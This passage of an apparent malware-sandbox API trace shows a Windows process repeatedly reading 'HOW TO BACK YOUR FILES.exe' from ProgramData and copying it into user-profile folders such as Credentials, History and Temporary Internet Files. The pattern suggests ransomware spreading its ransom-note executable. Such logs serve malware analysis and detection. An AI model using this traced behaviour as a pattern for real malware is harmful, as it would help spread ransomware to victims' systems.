Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.678] GetLastError () returned 0x0 [0042.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.678] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.678] CloseHandle (hObject=0x118) returned 1 [0042.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.678] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.678] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.678] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.678] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.679] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.679] GetLastError () returned 0x0 [0042.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.679] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.679] CloseHandle (hObject=0x118) returned 1 [0042.679] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.679] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.680] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.680] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.680] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.680] GetLastError () returned 0x0 [0042.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.680] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.680] CloseHandle (hObject=0x118) returned 1 [0042.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.681] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.681] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.682] GetLastError () returned 0x0 [0042.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.682] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.682] CloseHandle (hObject=0x118) returned 1 [0042.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.682] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.682] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.683] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.683] GetLastError () returned 0x0 [0042.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.683] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.683] CloseHandle (hObject=0x118) returned 1 [0042.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.683] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.684] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.684] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.684] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.684] GetLastError () returned 0x0 [0042.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.684] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.684] CloseHandle (hObject=0x118) returned 1 [0042.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.685] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.685] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.685] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.685] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.686] GetLastError () returned 0x0 [0042.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.686] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.686] CloseHandle (hObject=0x118) returned 1 [0042.686] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.686] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.686] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.687] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.687] GetLastError () returned 0x0 [0042.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.687] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.687] CloseHandle (hObject=0x118) returned 1 [0042.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.687] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.687] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.688] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.688] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.688] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.688] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.688] GetLastError () returned 0x0 [0042.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.688] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.688] CloseHandle (hObject=0x118) returned 1 [0042.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.689] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, 